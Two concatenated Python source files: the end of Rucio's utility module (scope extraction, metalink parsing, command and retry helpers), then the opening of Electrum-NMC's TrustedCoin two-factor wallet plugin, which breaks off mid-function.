if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/v2/server\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/managerv2\?SFN=', '', surl) # NOQA: W605
if surl.startswith('https://storage.googleapis.com'):
surl = surl.split('?GoogleAccessId')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 3:
if 'group.%s' % (split_did[3]) in scopes:
return 'group.%s' % split_did[3], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/'):
return 'test', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
def extract_scope(did, scopes=None):
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = _DEFAULT_EXTRACT
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str])
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def query_bunches(query, bunch_by):
"""
Queries output by yield_per sqlalchemy function
(which in a for loop returns rows one by one).
Groups the query rows in bunches of bunch_by
elements and returns list of bunches.
:param query: sqlalchemy session query
:param bunch_by: integer number
:returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
"""
filtered_bunches = []
item_bunch = []
for i in query.yield_per(bunch_by):
# i is either tuple of one element (token/model object etc.)
if not isinstance(i, tuple) and not isinstance(i, list):
item_bunch.append(i)
# or i is a tuple with the column elements per row
else:
item_bunch += i
if len(item_bunch) % bunch_by == 0:
filtered_bunches.append(item_bunch)
item_bunch = []
if item_bunch:
filtered_bunches.append(item_bunch)
return filtered_bunches
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args parametres of the func
:param kwargs: key word arguments of the func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=None):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger.debug('{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger.debug('{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger.debug(str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
|
trustedcoin.py | #!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import os
import requests
import json
from urllib.parse import urljoin
from urllib.parse import quote
import electrum_nmc as electrum
from electrum_nmc import bitcoin
from electrum_nmc import constants
from electrum_nmc import keystore
from electrum_nmc.bitcoin import *
from electrum_nmc.mnemonic import Mnemonic
from electrum_nmc import version
from electrum_nmc.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_nmc.i18n import _
from electrum_nmc.plugins import BasePlugin, hook
from electrum_nmc.util import NotEnoughFunds
from electrum_nmc.storage import STO_EV_USER_PW
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
kwargs = {'headers': {}}
if self.user_agent:
kwargs['headers']['user-agent'] = self.user_agent
if method == 'get' and data:
kwargs['params'] = data
elif method == 'post' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['content-type'] = 'application/json'
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
try:
response = requests.request(method, url, **kwargs)
except Exception as e:
raise ErrorConnectingServer(e)
if self.debug:
print(response.text)
if response.status_code != 200:
message = str(response.text)
if response.headers.get('content-type') == 'application/json':
r = response.json()
if 'message' in r:
message = r['message']
raise TrustedCoinException(message, response.status_code)
if response.headers.get('content-type') == 'application/json':
return response.json()
else:
return response.text
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self.auth_code = None
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
assert price <= 100000 * n
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = (TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def sign_transaction(self, tx, password):
Multisig_Wallet.sign_transaction(self, tx, password)
if tx.is_complete():
return
self.plugin.prompt_user_for_otp(self, tx)
if not self.auth_code:
self.print_error("sign_transaction: no auth code")
return
long_user_id, short_id = self.get_user_id()
tx_dict = tx.as_dict()
raw_tx = tx_dict["hex"]
r = server.sign(short_id, raw_tx, self.auth_code)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.auth_code = None
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return bitcoin.sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s):
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK2, c2 = bitcoin._CKD_pub(cK, c, s)
return bitcoin.serialize_xpub(version, c2, cK2)
def make_billing_address(wallet, num):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
version, _, _, _, c, cK = deserialize_xpub(xpub)
cK, c = bitcoin.CKD_pub(cK, c, num)
return bitcoin.public_key_to_p2pkh(cK)
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
return bitcoin.is_new_seed(seed, SEED_PREFIX)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
if wallet.billing_info is None:
assert wallet.can_sign_without_server()
return None
address = wallet.billing_info['billing_address']
for _type, addr, amount in tx.outputs():
if _type == TYPE_ADDRESS and addr == address:
return address, amount
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet):
if wallet.can_sign_without_server():
return
self.print_error("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
self.print_error('cannot connect to TrustedCoin server: {}'.format(e))
return
billing_address = make_billing_address(wallet, billing_info['billing_index'])
assert billing_address == billing_info['billing_address']
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self):
return Mnemonic('english').make_seed(seed_type='2fa', num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard):
wizard.set_icon(':icons/trustedcoin-wizard.png')
wizard.stack = []
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(DISCLAIMER), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('create_seed', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def create_seed(self, wizard):
seed = self.make_seed()
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, passphrase, derivation):
from electrum_nmc.mnemonic import Mnemonic
from electrum_nmc.keystore import bip32_root, bip32_private_derivation
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
